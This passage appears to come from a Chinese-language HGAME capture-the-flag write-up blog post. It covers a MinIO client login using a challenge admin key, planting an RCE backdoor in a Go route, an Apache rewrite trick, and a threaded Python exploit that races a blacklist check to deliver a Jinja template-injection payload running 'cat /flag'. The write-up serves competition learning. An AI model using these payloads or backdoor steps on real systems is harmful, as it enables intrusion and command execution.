class=\"wp-block-paragraph\">\u5728\u7528bp\u4f2a\u9020admin\u8bbf\u95ee\/flag<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"336\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250206144502748-1024x336.png\" alt=\"\" class=\"wp-image-31\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250206144502748-1024x336.png 1024w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250206144502748-300x98.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250206144502748-768x252.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250206144502748-1536x504.png 1536w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250206144502748-2048x672.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">Level 25 \u53cc\u9762\u4eba\u6d3e\u5bf9<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\u5148upx\u8131\u58f3<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"255\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250208184351132-1024x255.png\" alt=\"\" class=\"wp-image-32\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250208184351132-1024x255.png 1024w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250208184351132-300x75.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250208184351132-768x192.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250208184351132.png 1191w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u7528ida\u6253\u5f00\uff0c\u662f\u4e00\u4e2amc\u6876\u670d\u52a1<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"164\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250208185018241-1024x164.png\" alt=\"\" class=\"wp-image-33\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250208185018241-1024x164.png 1024w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250208185018241-300x48.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250208185018241-768x123.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250208185018241.png 1431w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u7136\u540e\u8fde\u63a5\uff0c<\/p>\n\n\n\n<div class=\"wp-block-columns is-layout-flex wp-container-core-columns-is-layout-8f761849 wp-block-columns-is-layout-flex\">\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\" style=\"flex-basis:100%\">\n<pre class=\"wp-block-preformatted\">mc alias set myminio http:\/\/node1.hgame.vidar.club:30516 minio_admin JPSQ4NOBvh2\/W7hzdLyRYLDm0wNRMG48BL09yOKGpHs=<\/pre>\n<\/div>\n<\/div>\n\n\n\n<p class=\"wp-block-paragraph\">\u67e5\u770b\u76ee\u5f55<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"64\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250208194755323-1024x64.png\" alt=\"\" class=\"wp-image-34\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250208194755323-1024x64.png 1024w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250208194755323-300x19.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250208194755323-768x48.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250208194755323-1536x95.png 1536w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250208194755323.png 1741w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u628ahints\u4e0b\u7684scr.zip\u63d0\u53d6\u51fa\u6765<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u662f\u4e00\u4e2ago\u8def\u7531\uff0c\u7136\u540e\u6dfb\u52a0rce\u9a6c\u8bbf\u95ee\u8def\u7531\u5373\u53ef<img decoding=\"async\" alt=\"image-20250208215457764\" src=\"\"><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">flag{y0u_s4ld_r1ghT-BUt-YoU-SH0uID-plAy-geNsHIN_imP4Ct0}<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Level 38475 \u89d2\u843d<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\u5148\u6253robots.txt<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u53d1\u73b0\/app.conf<\/p>\n\n\n\n<div class=\"wp-block-columns is-layout-flex wp-container-core-columns-is-layout-8f761849 wp-block-columns-is-layout-flex\">\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\" style=\"flex-basis:100%\">\n<pre class=\"wp-block-preformatted\">RewriteEngine On<br>RewriteCond \"%{HTTP_USER_AGENT}\" \"^L1nk\/\"<br>RewriteRule \"^\/admin\/(.*)$\" \"\/$1.html?secret=todo\"<\/pre>\n<\/div>\n<\/div>\n\n\n\n<p class=\"wp-block-paragraph\">\u5e94\u8be5\u662fRewrite\u7684CVE<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"946\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250209175402310-1024x946.png\" alt=\"\" class=\"wp-image-35\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250209175402310-1024x946.png 1024w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250209175402310-300x277.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250209175402310-768x709.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/02\/image-20250209175402310.png 1180w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u7136\u540e\u53bb\u8bfb\u53d6\u6e90\u7801\uff0c\u53d1\u73b0\u662f\u5ef6\u65f6\u68c0\u67e5\u9ed1\u540d\u5355\uff0c\u5f88\u7ecf\u5178\u7684\u6761\u4ef6\u7ade\u4e89<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">exp:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>import threading<br>import requests<br>Path = \"http:\/\/node1.hgame.vidar.club:32490\"<br>def send():<br>  while True:<br>\u200b    requests.post(f\"{Path}\/app\/send\", data={\"message\": \"\"\"{{&#91;].__class__.__base__.__subclasses__()&#91;140].__init__&#91;'__glo'+'bals__']&#91;'__builtins__']&#91;'eval'](\"__import__('os').popen('cat \/flag').read()\")}}\"\"\"})<br>def read():<br>  while True:<br>\u200b    print(requests.get(f\"{Path}\/app\/read\").text)<br>\\# \u521b\u5efa\u548c\u542f\u52a850\u4e2a\u53d1\u9001\u7ebf\u7a0b\u548c150\u4e2a\u8bfb\u53d6\u7ebf\u7a0b<br>threads = &#91;]<br>for _ in range(50):<br>  tosend = threading.Thread(target=send)<br>  toget = threading.Thread(target=read)<br>  threads.append(tosend)<br>  threads.append(toget)<br>  tosend.start()<br>  toget.start()<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u5f97\u5230flag<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">hgame{YOu-f1Nd_TH3_kEy_TO-Rrr4C3-oUuuUt22e0754}<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>&#8212;&#8211;by Hurkin \u7b7e\u5230 TEST NC \u4ece\u8fd9\u91cc\u5f00\u59cb\u7684\u5e8f\u7ae0\u3002 hgame{Now-I-kn0w-how-to-subm1 &#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"emotion":"","emotion_color":"","title_style":"","license":"","_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[1],"tags":[],"class_list":["post-10","post","type-post","status-publish","format-standard","hentry","category-some-competition"],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/www.hurkin.top\/index.php\/wp-json\/wp\/v2\/posts\/10","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.hurkin.top\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.hurkin.top\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.hurkin.top\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.hurkin.top\/index.php\/wp-json\/wp\/v2\/comments?post=10"}],"version-history":[{"count":6,"href":"https:\/\/www.hurkin.top\/index.php\/wp-json\/wp\/v2\/posts\/10\/revisions"}],"predecessor-version":[{"id":55,"href":"https:\/\/www.hurkin.top\/index.php\/wp-json\/wp\/v2\/posts\/10\/revisions\/55"}],"wp:attachment":[{"href":"https:\/\/www.hurkin.top\/index.php\/wp-json\/wp\/v2\/media?parent=10"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.hurkin.top\/index.php\/wp-json\/wp\/v2\/categories?post=10"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.hurkin.top\/index.php\/wp-json\/wp\/v2\/tags?post=10"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}